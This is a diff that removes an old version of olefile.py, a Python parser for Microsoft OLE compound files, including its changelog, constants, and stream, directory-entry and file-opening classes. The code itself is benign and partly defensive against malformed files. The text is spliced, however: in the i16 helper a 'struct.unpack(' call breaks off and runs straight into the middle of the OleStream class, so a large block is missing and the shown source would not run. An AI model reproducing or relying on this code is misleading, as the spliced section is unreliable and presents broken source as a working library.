-# 2014-07-30 v0.32 PL: - added write_sect to write sectors to disk
-# - added write_mode option to OleFileIO.__init__ and open
-# 2014-07-31 PL: - fixed padding in write_sect for Python 3, added checks
-# - added write_stream to write a stream to disk
-# 2014-09-26 v0.40 PL: - renamed OleFileIO_PL to olefile
-# 2014-11-09 NE: - added support for Jython (Niko Ehrenfeuchter)
-# 2014-11-13 v0.41 PL: - improved isOleFile and OleFileIO.open to support OLE
-# data in a string buffer and file-like objects.
-# 2014-11-21 PL: - updated comments according to Pillow's commits
-# 2015-01-24 v0.42 PL: - changed the default path name encoding from Latin-1
-# to UTF-8 on Python 2.x (Unicode on Python 3.x)
-# - added path_encoding option to override the default
-# - fixed a bug in _list when a storage is empty
-# 2015-04-17 v0.43 PL: - slight changes in OleDirectoryEntry
-# 2015-10-19 - fixed issue #26 in OleFileIO.getproperties
-# (using id and type as local variable names)
-# 2015-10-29 - replaced debug() with proper logging
-# - use optparse to handle command line options
-# - improved attribute names in OleFileIO class
-# 2015-11-05 - fixed issue #27 by correcting the MiniFAT sector
-# cutoff size if invalid.
-# 2016-02-02 - logging is disabled by default
-# 2016-04-26 v0.44 PL: - added enable_logging
-# - renamed _OleDirectoryEntry and _OleStream without '_'
-# - in OleStream use _raise_defect instead of exceptions
-# 2016-04-27 - added support for incomplete streams and incorrect
-# directory entries (to read malformed documents)
-# 2016-05-04 - fixed slight bug in OleStream
-# 2016-11-27 DR: - added method to get the clsid of a storage/stream
-# (Daniel Roethlisberger)
-# 2017-05-31 v0.45 BS: - PR #114 from oletools to handle excessive number of
-# properties:
-# https://github.com/decalage2/oletools/pull/114
-# 2017-07-11 PL: - ignore incorrect ByteOrder (issue #70)
-
-__date__ = "2017-07-11"
-__version__ = '0.45dev2'
-__author__ = "Philippe Lagadec"
-
-#-----------------------------------------------------------------------------
-# TODO (for version 1.0):
-# + get rid of print statements, to simplify Python 2.x and 3.x support
-# + add is_stream and is_storage
-# + remove leading and trailing slashes where a path is used
-# + add functions path_list2str and path_str2list
-# + fix how all the methods handle unicode str and/or bytes as arguments
-# + add path attrib to _OleDirEntry, set it once and for all in init or
-# append_kids (then listdir/_list can be simplified)
-# - TESTS with Linux, MacOSX, Python 1.5.2, various files, PIL, ...
-# - add underscore to each private method, to avoid their display in
-# pydoc/epydoc documentation - Remove it for classes to be documented
-# - replace all raised exceptions with _raise_defect (at least in OleFileIO)
-# - merge code from OleStream and OleFileIO.getsect to read sectors
-# (maybe add a class for FAT and MiniFAT ?)
-# - add method to check all streams (follow sectors chains without storing all
-# stream in memory, and report anomalies)
-# - use OleDirectoryEntry.kids_dict to improve _find and _list ?
-# - fix Unicode names handling (find some way to stay compatible with Py1.5.2)
-# => if possible avoid converting names to Latin-1
-# - review DIFAT code: fix handling of DIFSECT blocks in FAT (not stop)
-# - rewrite OleFileIO.getproperties
-# - improve docstrings to show more sample uses
-# - see also original notes and FIXME below
-# - remove all obsolete FIXMEs
-# - OleMetadata: fix version attrib according to
-# https://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
-
-# IDEAS:
-# - in OleFileIO._open and OleStream, use size=None instead of 0x7FFFFFFF for
-# streams with unknown size
-# - use arrays of int instead of long integers for FAT/MiniFAT, to improve
-# performance and reduce memory usage ? (possible issue with values >2^31)
-# - provide tests with unittest (may need write support to create samples)
-# - move all debug code (and maybe dump methods) to a separate module, with
-# a class which inherits OleFileIO ?
-# - fix docstrings to follow epydoc format
-# - add support for big endian byte order ?
-# - create a simple OLE explorer with wxPython
-
-# FUTURE EVOLUTIONS to add write support:
-# see issue #6 on GitHub:
-# https://github.com/decalage2/olefile/issues/6
-
-#-----------------------------------------------------------------------------
-# NOTES from PIL 1.1.6:
-
-# History:
-# 1997-01-20 fl Created
-# 1997-01-22 fl Fixed 64-bit portability quirk
-# 2003-09-09 fl Fixed typo in OleFileIO.loadfat (noted by Daniel Haertle)
-# 2004-02-29 fl Changed long hex constants to signed integers
-#
-# Notes:
-# FIXME: sort out sign problem (eliminate long hex constants)
-# FIXME: change filename to use "a/b/c" instead of ["a", "b", "c"]
-# FIXME: provide a glob mechanism function (using fnmatchcase)
-#
-# Literature:
-#
-# "FlashPix Format Specification, Appendix A", Kodak and Microsoft,
-# September 1996.
-#
-# Quotes:
-#
-# "If this document and functionality of the Software conflict,
-# the actual functionality of the Software represents the correct
-# functionality" -- Microsoft, in the OLE format specification
-
-#------------------------------------------------------------------------------
-
-__all__ = ['isOleFile', 'OleFileIO', 'OleMetadata', 'enable_logging',
- 'MAGIC', 'STGTY_EMPTY',
- 'STGTY_STREAM', 'STGTY_STORAGE', 'STGTY_ROOT', 'STGTY_PROPERTY',
- 'STGTY_LOCKBYTES', 'MINIMAL_OLEFILE_SIZE', 'NOSTREAM']
-
-import io
-import sys
-import struct, array, os.path, datetime, logging
-
-#=== COMPATIBILITY WORKAROUNDS ================================================
-
-#[PL] Define explicitly the public API to avoid private objects in pydoc:
-#TODO: add more
-# __all__ = ['OleFileIO', 'isOleFile', 'MAGIC']
-
-# For Python 3.x, need to redefine long as int:
-if str is not bytes:
- long = int
-
-# Need to make sure we use xrange both on Python 2 and 3.x:
-try:
- # on Python 2 we need xrange:
- iterrange = xrange
-except:
- # no xrange, for Python 3 it was renamed as range:
- iterrange = range
-
-#[PL] workaround to fix an issue with array item size on 64 bits systems:
-if array.array('L').itemsize == 4:
- # on 32 bits platforms, long integers in an array are 32 bits:
- UINT32 = 'L'
-elif array.array('I').itemsize == 4:
- # on 64 bits platforms, integers in an array are 32 bits:
- UINT32 = 'I'
-elif array.array('i').itemsize == 4:
- # On 64 bit Jython, signed integers ('i') are the only way to store our 32
- # bit values in an array in a *somewhat* reasonable way, as the otherwise
- # perfectly suited 'H' (unsigned int, 32 bits) results in a completely
- # unusable behaviour. This is most likely caused by the fact that Java
- # doesn't have unsigned values, and thus Jython's "array" implementation,
- # which is based on "jarray", doesn't have them either.
- # NOTE: to trick Jython into converting the values it would normally
- # interpret as "signed" into "unsigned", a binary-and operation with
- # 0xFFFFFFFF can be used. This way it is possible to use the same comparing
- # operations on all platforms / implementations. The corresponding code
- # lines are flagged with a 'JYTHON-WORKAROUND' tag below.
- UINT32 = 'i'
-else:
- raise ValueError('Need to fix a bug with 32 bit arrays, please contact author...')
-
-
-#[PL] These workarounds were inspired from the Path module
-# (see http://www.jorendorff.com/articles/python/path/)
-try:
- basestring
-except NameError:
- basestring = str
-
-#[PL] Experimental setting: if True, OLE filenames will be kept in Unicode
-# if False (default PIL behaviour), all filenames are converted to Latin-1.
-KEEP_UNICODE_NAMES = True
-
-if sys.version_info[0] < 3:
- # On Python 2.x, the default encoding for path names is UTF-8:
- DEFAULT_PATH_ENCODING = 'utf-8'
-else:
- # On Python 3.x, the default encoding for path names is Unicode (None):
- DEFAULT_PATH_ENCODING = None
-
-
-# === LOGGING =================================================================
-
-class NullHandler(logging.Handler):
- """
- Log Handler without output, to avoid printing messages if logging is not
- configured by the main application.
- Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
- """
- def emit(self, record):
- pass
-
-def get_logger(name, level=logging.CRITICAL+1):
- """
- Create a suitable logger object for this module.
- The goal is not to change settings of the root logger, to avoid getting
- other modules' logs on the screen.
- If a logger exists with same name, reuse it. (Else it would have duplicate
- handlers and messages would be doubled.)
- The level is set to CRITICAL+1 by default, to avoid any logging.
- """
- # First, test if there is already a logger with the same name, else it
- # will generate duplicate messages (due to duplicate handlers):
- if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
- # use getLogger then test if its effective level is not default.
- logger = logging.getLogger(name)
- # make sure level is OK:
- logger.setLevel(level)
- return logger
- # get a new logger:
- logger = logging.getLogger(name)
- # only add a NullHandler for this logger, it is up to the application
- # to configure its own logging:
- logger.addHandler(NullHandler())
- logger.setLevel(level)
- return logger
-
-
-# a global logger object used for debugging:
-log = get_logger('olefile')
-
-
-def enable_logging():
- """
- Enable logging for this module (disabled by default).
- This will set the module-specific logger level to NOTSET, which
- means the main application controls the actual logging level.
- """
- log.setLevel(logging.NOTSET)
-
-
-#=== CONSTANTS ===============================================================
-
-#: magic bytes that should be at the beginning of every OLE file:
-MAGIC = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'
-
-#[PL]: added constants for Sector IDs (from AAF specifications)
-MAXREGSECT = 0xFFFFFFFA #: (-6) maximum SECT
-DIFSECT = 0xFFFFFFFC #: (-4) denotes a DIFAT sector in a FAT
-FATSECT = 0xFFFFFFFD #: (-3) denotes a FAT sector in a FAT
-ENDOFCHAIN = 0xFFFFFFFE #: (-2) end of a virtual stream chain
-FREESECT = 0xFFFFFFFF #: (-1) unallocated sector
-
-#[PL]: added constants for Directory Entry IDs (from AAF specifications)
-MAXREGSID = 0xFFFFFFFA #: (-6) maximum directory entry ID
-NOSTREAM = 0xFFFFFFFF #: (-1) unallocated directory entry
-
-#[PL] object types in storage (from AAF specifications)
-STGTY_EMPTY = 0 #: empty directory entry
-STGTY_STORAGE = 1 #: element is a storage object
-STGTY_STREAM = 2 #: element is a stream object
-STGTY_LOCKBYTES = 3 #: element is an ILockBytes object
-STGTY_PROPERTY = 4 #: element is an IPropertyStorage object
-STGTY_ROOT = 5 #: element is a root storage
-
-# Unknown size for a stream (used by OleStream):
-UNKNOWN_SIZE = 0x7FFFFFFF
-
-#
-# --------------------------------------------------------------------
-# property types
-
-VT_EMPTY=0; VT_NULL=1; VT_I2=2; VT_I4=3; VT_R4=4; VT_R8=5; VT_CY=6;
-VT_DATE=7; VT_BSTR=8; VT_DISPATCH=9; VT_ERROR=10; VT_BOOL=11;
-VT_VARIANT=12; VT_UNKNOWN=13; VT_DECIMAL=14; VT_I1=16; VT_UI1=17;
-VT_UI2=18; VT_UI4=19; VT_I8=20; VT_UI8=21; VT_INT=22; VT_UINT=23;
-VT_VOID=24; VT_HRESULT=25; VT_PTR=26; VT_SAFEARRAY=27; VT_CARRAY=28;
-VT_USERDEFINED=29; VT_LPSTR=30; VT_LPWSTR=31; VT_FILETIME=64;
-VT_BLOB=65; VT_STREAM=66; VT_STORAGE=67; VT_STREAMED_OBJECT=68;
-VT_STORED_OBJECT=69; VT_BLOB_OBJECT=70; VT_CF=71; VT_CLSID=72;
-VT_VECTOR=0x1000;
-
-# map property id to name (for debugging purposes)
-
-VT = {}
-for keyword, var in list(vars().items()):
- if keyword[:3] == "VT_":
- VT[var] = keyword
-
-#
-# --------------------------------------------------------------------
-# Some common document types (root.clsid fields)
-
-WORD_CLSID = "00020900-0000-0000-C000-000000000046"
-#TODO: check Excel, PPT, ...
-
-#[PL]: Defect levels to classify parsing errors - see OleFileIO._raise_defect()
-DEFECT_UNSURE = 10 # a case which looks weird, but not sure it's a defect
-DEFECT_POTENTIAL = 20 # a potential defect
-DEFECT_INCORRECT = 30 # an error according to specifications, but parsing
- # can go on
-DEFECT_FATAL = 40 # an error which cannot be ignored, parsing is
- # impossible
-
-# Minimal size of an empty OLE file, with 512-bytes sectors = 1536 bytes
-# (this is used in isOleFile and OleFile.open)
-MINIMAL_OLEFILE_SIZE = 1536
-
-#[PL] add useful constants to __all__:
-# for key in list(vars().keys()):
-# if key.startswith('STGTY_') or key.startswith('DEFECT_'):
-# __all__.append(key)
-
-
-#=== FUNCTIONS ===============================================================
-
-def isOleFile (filename):
- """
- Test if a file is an OLE container (according to the magic bytes in its header).
-
- .. note::
- This function only checks the first 8 bytes of the file, not the
- rest of the OLE structure.
-
- .. versionadded:: 0.16
-
- :param filename: filename, contents or file-like object of the OLE file (string-like or file-like object)
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read and seek methods),
- it is parsed as-is.
-
- :type filename: bytes or str or unicode or file
- :returns: True if OLE, False otherwise.
- :rtype: bool
- """
- # check if filename is a string-like or file-like object:
- if hasattr(filename, 'read'):
- # file-like object: use it directly
- header = filename.read(len(MAGIC))
- # just in case, seek back to start of file:
- filename.seek(0)
- elif isinstance(filename, bytes) and len(filename) >= MINIMAL_OLEFILE_SIZE:
- # filename is a bytes string containing the OLE file to be parsed:
- header = filename[:len(MAGIC)]
- else:
- # string-like object: filename of file on disk
- with open(filename, 'rb') as fp:
- header = fp.read(len(MAGIC))
- if header == MAGIC:
- return True
- else:
- return False
-
-
-if bytes is str:
- # version for Python 2.x
- def i8(c):
- return ord(c)
-else:
- # version for Python 3.x
- def i8(c):
- return c if c.__class__ is int else c[0]
-
-
-def i16(c, o = 0):
- """
- Converts a 2-bytes (16 bits) string to an integer.
-
- :param c: string containing bytes to convert
- :param o: offset of bytes to convert in string
- """
- return struct.unpack(" len(fat):
- self.ole._raise_defect(DEFECT_INCORRECT, 'malformed OLE document, stream too large')
- # optimization(?): data is first a list of strings, and join() is called
- # at the end to concatenate all in one string.
- # (this may not be really useful with recent Python versions)
- data = []
- # if size is zero, then first sector index should be ENDOFCHAIN:
- if size == 0 and sect != ENDOFCHAIN:
- log.debug('size == 0 and sect != ENDOFCHAIN:')
- self.ole._raise_defect(DEFECT_INCORRECT, 'incorrect OLE sector index for empty stream')
- #[PL] A fixed-length for loop is used instead of an undefined while
- # loop to avoid DoS attacks:
- for i in range(nb_sectors):
- log.debug('Reading stream sector[%d] = %Xh' % (i, sect))
- # Sector index may be ENDOFCHAIN, but only if size was unknown
- if sect == ENDOFCHAIN:
- if unknown_size:
- log.debug('Reached ENDOFCHAIN sector for stream with unknown size')
- break
- else:
- # else this means that the stream is smaller than declared:
- log.debug('sect=ENDOFCHAIN before expected size')
- self.ole._raise_defect(DEFECT_INCORRECT, 'incomplete OLE stream')
- # sector index should be within FAT:
- if sect<0 or sect>=len(fat):
- log.debug('sect=%d (%X) / len(fat)=%d' % (sect, sect, len(fat)))
- log.debug('i=%d / nb_sectors=%d' %(i, nb_sectors))
-## tmp_data = b"".join(data)
-## f = open('test_debug.bin', 'wb')
-## f.write(tmp_data)
-## f.close()
-## log.debug('data read so far: %d bytes' % len(tmp_data))
- self.ole._raise_defect(DEFECT_INCORRECT, 'incorrect OLE FAT, sector index out of range')
- # stop reading here if the exception is ignored:
- break
- #TODO: merge this code with OleFileIO.getsect() ?
- #TODO: check if this works with 4K sectors:
- try:
- fp.seek(offset + sectorsize * sect)
- except:
- log.debug('sect=%d, seek=%d, filesize=%d' %
- (sect, offset+sectorsize*sect, filesize))
- self.ole._raise_defect(DEFECT_INCORRECT, 'OLE sector index out of range')
- # stop reading here if the exception is ignored:
- break
- sector_data = fp.read(sectorsize)
- # [PL] check if there was enough data:
- # Note: if sector is the last of the file, sometimes it is not a
- # complete sector (of 512 or 4K), so we may read less than
- # sectorsize.
- if len(sector_data)!=sectorsize and sect!=(len(fat)-1):
- log.debug('sect=%d / len(fat)=%d, seek=%d / filesize=%d, len read=%d' %
- (sect, len(fat), offset+sectorsize*sect, filesize, len(sector_data)))
- log.debug('seek+len(read)=%d' % (offset+sectorsize*sect+len(sector_data)))
- self.ole._raise_defect(DEFECT_INCORRECT, 'incomplete OLE sector')
- data.append(sector_data)
- # jump to next sector in the FAT:
- try:
- sect = fat[sect] & 0xFFFFFFFF # JYTHON-WORKAROUND
- except IndexError:
- # [PL] if pointer is out of the FAT an exception is raised
- self.ole._raise_defect(DEFECT_INCORRECT, 'incorrect OLE FAT, sector index out of range')
- # stop reading here if the exception is ignored:
- break
- #[PL] Last sector should be a "end of chain" marker:
- # if sect != ENDOFCHAIN:
- # raise IOError('incorrect last sector index in OLE stream')
- data = b"".join(data)
- # Data is truncated to the actual stream size:
- if len(data) >= size:
- log.debug('Read data of length %d, truncated to stream size %d' % (len(data), size))
- data = data[:size]
- # actual stream size is stored for future use:
- self.size = size
- elif unknown_size:
- # actual stream size was not known, now we know the size of read
- # data:
- log.debug('Read data of length %d, the stream size was unknown' % len(data))
- self.size = len(data)
- else:
- # read data is less than expected:
- log.debug('Read data of length %d, less than expected stream size %d' % (len(data), size))
- # TODO: provide details in exception message
- self.size = len(data)
- self.ole._raise_defect(DEFECT_INCORRECT, 'OLE stream size is less than declared')
- # when all data is read in memory, BytesIO constructor is called
- io.BytesIO.__init__(self, data)
- # Then the OleStream object can be used as a read-only file object.
-
-
-#--- OleDirectoryEntry -------------------------------------------------------
-
-class OleDirectoryEntry:
-
- """
- OLE2 Directory Entry
- """
- #[PL] parsing code moved from OleFileIO.loaddirectory
-
- # struct to parse directory entries:
- # <: little-endian byte order, standard sizes
- # (note: this should guarantee that Q returns a 64 bits int)
- # 64s: string containing entry name in unicode UTF-16 (max 31 chars) + null char = 64 bytes
- # H: uint16, number of bytes used in name buffer, including null = (len+1)*2
- # B: uint8, dir entry type (between 0 and 5)
- # B: uint8, color: 0=black, 1=red
- # I: uint32, index of left child node in the red-black tree, NOSTREAM if none
- # I: uint32, index of right child node in the red-black tree, NOSTREAM if none
- # I: uint32, index of child root node if it is a storage, else NOSTREAM
- # 16s: CLSID, unique identifier (only used if it is a storage)
- # I: uint32, user flags
- # Q (was 8s): uint64, creation timestamp or zero
- # Q (was 8s): uint64, modification timestamp or zero
- # I: uint32, SID of first sector if stream or ministream, SID of 1st sector
- # of stream containing ministreams if root entry, 0 otherwise
- # I: uint32, total stream size in bytes if stream (low 32 bits), 0 otherwise
- # I: uint32, total stream size in bytes if stream (high 32 bits), 0 otherwise
- STRUCT_DIRENTRY = '<64sHBBIII16sIQQIII'
- # size of a directory entry: 128 bytes
- DIRENTRY_SIZE = 128
- assert struct.calcsize(STRUCT_DIRENTRY) == DIRENTRY_SIZE
-
-
- def __init__(self, entry, sid, olefile):
- """
- Constructor for an OleDirectoryEntry object.
- Parses a 128-bytes entry from the OLE Directory stream.
-
- :param entry : string (must be 128 bytes long)
- :param sid : index of this directory entry in the OLE file directory
- :param olefile: OleFileIO containing this directory entry
- """
- self.sid = sid
- # ref to olefile is stored for future use
- self.olefile = olefile
- # kids is a list of children entries, if this entry is a storage:
- # (list of OleDirectoryEntry objects)
- self.kids = []
- # kids_dict is a dictionary of children entries, indexed by their
- # name in lowercase: used to quickly find an entry, and to detect
- # duplicates
- self.kids_dict = {}
- # flag used to detect if the entry is referenced more than once in
- # directory:
- self.used = False
- # decode DirEntry
- (
- self.name_raw, # 64s: string containing entry name in unicode UTF-16 (max 31 chars) + null char = 64 bytes
- self.namelength, # H: uint16, number of bytes used in name buffer, including null = (len+1)*2
- self.entry_type,
- self.color,
- self.sid_left,
- self.sid_right,
- self.sid_child,
- clsid,
- self.dwUserFlags,
- self.createTime,
- self.modifyTime,
- self.isectStart,
- self.sizeLow,
- self.sizeHigh
- ) = struct.unpack(OleDirectoryEntry.STRUCT_DIRENTRY, entry)
- if self.entry_type not in [STGTY_ROOT, STGTY_STORAGE, STGTY_STREAM, STGTY_EMPTY]:
- olefile._raise_defect(DEFECT_INCORRECT, 'unhandled OLE storage type')
- # only first directory entry can (and should) be root:
- if self.entry_type == STGTY_ROOT and sid != 0:
- olefile._raise_defect(DEFECT_INCORRECT, 'duplicate OLE root entry')
- if sid == 0 and self.entry_type != STGTY_ROOT:
- olefile._raise_defect(DEFECT_INCORRECT, 'incorrect OLE root entry')
- #log.debug(struct.unpack(fmt_entry, entry[:len_entry]))
- # name should be at most 31 unicode characters + null character,
- # so 64 bytes in total (31*2 + 2):
- if self.namelength>64:
- olefile._raise_defect(DEFECT_INCORRECT, 'incorrect DirEntry name length >64 bytes')
- # if exception not raised, namelength is set to the maximum value:
- self.namelength = 64
- # only characters without ending null char are kept:
- self.name_utf16 = self.name_raw[:(self.namelength-2)]
- #TODO: check if the name is actually followed by a null unicode character ([MS-CFB] 2.6.1)
- #TODO: check if the name does not contain forbidden characters:
- # [MS-CFB] 2.6.1: "The following characters are illegal and MUST NOT be part of the name: '/', '\', ':', '!'."
- # name is converted from UTF-16LE to the path encoding specified in the OleFileIO:
- self.name = olefile._decode_utf16_str(self.name_utf16)
-
- log.debug('DirEntry SID=%d: %s' % (self.sid, repr(self.name)))
- log.debug(' - type: %d' % self.entry_type)
- log.debug(' - sect: %Xh' % self.isectStart)
- log.debug(' - SID left: %d, right: %d, child: %d' % (self.sid_left,
- self.sid_right, self.sid_child))
-
- # sizeHigh is only used for 4K sectors, it should be zero for 512 bytes
- # sectors, BUT apparently some implementations set it as 0xFFFFFFFF, 1
- # or some other value so it cannot be raised as a defect in general:
- if olefile.sectorsize == 512:
- if self.sizeHigh != 0 and self.sizeHigh != 0xFFFFFFFF:
- log.debug('sectorsize=%d, sizeLow=%d, sizeHigh=%d (%X)' %
- (olefile.sectorsize, self.sizeLow, self.sizeHigh, self.sizeHigh))
- olefile._raise_defect(DEFECT_UNSURE, 'incorrect OLE stream size')
- self.size = self.sizeLow
- else:
- self.size = self.sizeLow + (long(self.sizeHigh)<<32)
- log.debug(' - size: %d (sizeLow=%d, sizeHigh=%d)' % (self.size, self.sizeLow, self.sizeHigh))
-
- self.clsid = _clsid(clsid)
- # a storage should have a null size, BUT some implementations such as
- # Word 8 for Mac seem to allow non-null values => Potential defect:
- if self.entry_type == STGTY_STORAGE and self.size != 0:
- olefile._raise_defect(DEFECT_POTENTIAL, 'OLE storage with size>0')
- # check if stream is not already referenced elsewhere:
- if self.entry_type in (STGTY_ROOT, STGTY_STREAM) and self.size>0:
- if self.size < olefile.minisectorcutoff \
- and self.entry_type==STGTY_STREAM: # only streams can be in MiniFAT
- # ministream object
- minifat = True
- else:
- minifat = False
- olefile._check_duplicate_stream(self.isectStart, minifat)
-
-
-
- def build_storage_tree(self):
- """
- Read and build the red-black tree attached to this OleDirectoryEntry
- object, if it is a storage.
- Note that this method builds a tree of all subentries, so it should
- only be called for the root object once.
- """
- log.debug('build_storage_tree: SID=%d - %s - sid_child=%d'
- % (self.sid, repr(self.name), self.sid_child))
- if self.sid_child != NOSTREAM:
- # if child SID is not NOSTREAM, then this entry is a storage.
- # Let's walk through the tree of children to fill the kids list:
- self.append_kids(self.sid_child)
-
- # Note from OpenOffice documentation: the safest way is to
- # recreate the tree because some implementations may store broken
- # red-black trees...
-
- # in the OLE file, entries are sorted on (length, name).
- # for convenience, we sort them on name instead:
- # (see rich comparison methods in this class)
- self.kids.sort()
-
-
- def append_kids(self, child_sid):
- """
- Walk through red-black tree of children of this directory entry to add
- all of them to the kids list. (recursive method)
-
- :param child_sid: index of child directory entry to use, or None when called
- first time for the root. (only used during recursion)
- """
- log.debug('append_kids: child_sid=%d' % child_sid)
- #[PL] this method was added to use simple recursion instead of a complex
- # algorithm.
- # if this is not a storage or a leaf of the tree, nothing to do:
- if child_sid == NOSTREAM:
- return
- # check if child SID is in the proper range:
- if child_sid<0 or child_sid>=len(self.olefile.direntries):
- self.olefile._raise_defect(DEFECT_INCORRECT, 'OLE DirEntry index out of range')
- else:
- # get child direntry:
- child = self.olefile._load_direntry(child_sid) #direntries[child_sid]
- log.debug('append_kids: child_sid=%d - %s - sid_left=%d, sid_right=%d, sid_child=%d'
- % (child.sid, repr(child.name), child.sid_left, child.sid_right, child.sid_child))
- # the directory entries are organized as a red-black tree.
- # (cf. Wikipedia for details)
- # First walk through left side of the tree:
- self.append_kids(child.sid_left)
- # Check if its name is not already used (case-insensitive):
- name_lower = child.name.lower()
- if name_lower in self.kids_dict:
- self.olefile._raise_defect(DEFECT_INCORRECT,
- "Duplicate filename in OLE storage")
- # Then the child_sid OleDirectoryEntry object is appended to the
- # kids list and dictionary:
- self.kids.append(child)
- self.kids_dict[name_lower] = child
- # Check if kid was not already referenced in a storage:
- if child.used:
- self.olefile._raise_defect(DEFECT_INCORRECT,
- 'OLE Entry referenced more than once')
- child.used = True
- # Finally walk through right side of the tree:
- self.append_kids(child.sid_right)
- # Afterwards build kid's own tree if it's also a storage:
- child.build_storage_tree()
-
-
- def __eq__(self, other):
- "Compare entries by name"
- return self.name == other.name
-
- def __lt__(self, other):
- "Compare entries by name"
- return self.name < other.name
-
- def __ne__(self, other):
- return not self.__eq__(other)
-
- def __le__(self, other):
- return self.__eq__(other) or self.__lt__(other)
-
- # Reflected __lt__() and __le__() will be used for __gt__() and __ge__()
-
- #TODO: replace by the same function as MS implementation ?
- # (order by name length first, then case-insensitive order)
-
-
- def dump(self, tab = 0):
- "Dump this entry, and all its subentries (for debug purposes only)"
- TYPES = ["(invalid)", "(storage)", "(stream)", "(lockbytes)",
- "(property)", "(root)"]
- print(" "*tab + repr(self.name), TYPES[self.entry_type], end=' ')
- if self.entry_type in (STGTY_STREAM, STGTY_ROOT):
- print(self.size, "bytes", end=' ')
- print()
- if self.entry_type in (STGTY_STORAGE, STGTY_ROOT) and self.clsid:
- print(" "*tab + "{%s}" % self.clsid)
-
- for kid in self.kids:
- kid.dump(tab + 2)
-
-
- def getmtime(self):
- """
- Return modification time of a directory entry.
-
- :returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- if self.modifyTime == 0:
- return None
- return filetime2datetime(self.modifyTime)
-
-
- def getctime(self):
- """
- Return creation time of a directory entry.
-
- :returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- if self.createTime == 0:
- return None
- return filetime2datetime(self.createTime)
-
-
-#--- OleFileIO ----------------------------------------------------------------
-
-class OleFileIO:
- """
- OLE container object
-
- This class encapsulates the interface to an OLE 2 structured
- storage file. Use the listdir and openstream methods to
- access the contents of this file.
-
- Object names are given as a list of strings, one for each subentry
- level. The root entry should be omitted. For example, the following
- code extracts all image streams from a Microsoft Image Composer file::
-
- ole = OleFileIO("fan.mic")
-
- for entry in ole.listdir():
- if entry[1:2] == "Image":
- fin = ole.openstream(entry)
- fout = open(entry[0:1], "wb")
- while True:
- s = fin.read(8192)
- if not s:
- break
- fout.write(s)
-
- You can use the viewer application provided with the Python Imaging
- Library to view the resulting files (which happens to be standard
- TIFF files).
- """
-
- def __init__(self, filename=None, raise_defects=DEFECT_FATAL,
- write_mode=False, debug=False, path_encoding=DEFAULT_PATH_ENCODING):
- """
- Constructor for the OleFileIO class.
-
- :param filename: file to open.
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
- :param raise_defects: minimal level for defects to be raised as exceptions.
- (use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a
- security-oriented application, see source code for details)
-
- :param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default.
-
- :param debug: bool, set debug mode (deprecated, not used anymore)
-
- :param path_encoding: None or str, name of the codec to use for path
- names (streams and storages), or None for Unicode.
- Unicode by default on Python 3+, UTF-8 on Python 2.x.
- (new in olefile 0.42, was hardcoded to Latin-1 until olefile v0.41)
- """
- # minimal level for defects to be raised as exceptions:
- self._raise_defects_level = raise_defects
- #: list of defects/issues not raised as exceptions:
- #: tuples of (exception type, message)
- self.parsing_issues = []
- self.write_mode = write_mode
- self.path_encoding = path_encoding
- self._filesize = None
- self.fp = None
- if filename:
- self.open(filename, write_mode=write_mode)
-
-
- def _raise_defect(self, defect_level, message, exception_type=IOError):
- """
- This method should be called for any defect found during file parsing.
- It may raise an IOError exception according to the minimal level chosen
- for the OleFileIO object.
-
- :param defect_level: defect level, possible values are:
-
- - DEFECT_UNSURE : a case which looks weird, but not sure it's a defect
- - DEFECT_POTENTIAL : a potential defect
- - DEFECT_INCORRECT : an error according to specifications, but parsing can go on
- - DEFECT_FATAL : an error which cannot be ignored, parsing is impossible
-
- :param message: string describing the defect, used with raised exception.
- :param exception_type: exception class to be raised, IOError by default
- """
- # added by [PL]
- if defect_level >= self._raise_defects_level:
- log.error(message)
- raise exception_type(message)
- else:
- # just record the issue, no exception raised:
- self.parsing_issues.append((exception_type, message))
- log.warning(message)
-
-
- def _decode_utf16_str(self, utf16_str, errors='replace'):
- """
- Decode a string encoded in UTF-16 LE format, as found in the OLE
- directory or in property streams. Return a string encoded
- according to the path_encoding specified for the OleFileIO object.
-
- :param utf16_str: bytes string encoded in UTF-16 LE format
- :param errors: str, see python documentation for str.decode()
- :return: str, encoded according to path_encoding
- """
- unicode_str = utf16_str.decode('UTF-16LE', errors)
- if self.path_encoding:
- # an encoding has been specified for path names:
- return unicode_str.encode(self.path_encoding, errors)
- else:
- # path_encoding=None, return the Unicode string as-is:
- return unicode_str
-
-
- def open(self, filename, write_mode=False):
- """
- Open an OLE2 file in read-only or read/write mode.
- Read and parse the header, FAT and directory.
-
- :param filename: string-like or file-like object, OLE file to parse
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
- :param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default. (ignored if filename is not a path)
- """
- self.write_mode = write_mode
- #[PL] check if filename is a string-like or file-like object:
- # (it is better to check for a read() method)
- if hasattr(filename, 'read'):
- #TODO: also check seek and tell methods?
- # file-like object: use it directly
- self.fp = filename
- elif isinstance(filename, bytes) and len(filename) >= MINIMAL_OLEFILE_SIZE:
- # filename is a bytes string containing the OLE file to be parsed:
- # convert it to BytesIO
- self.fp = io.BytesIO(filename)
- else:
- # string-like object: filename of file on disk
- if self.write_mode:
- # open file in mode 'read with update, binary'
- # According to https://docs.python.org/2/library/functions.html#open
- # 'w' would truncate the file, 'a' may only append on some Unixes
- mode = 'r+b'
- else:
- # read-only mode by default
- mode = 'rb'
- self.fp = open(filename, mode)
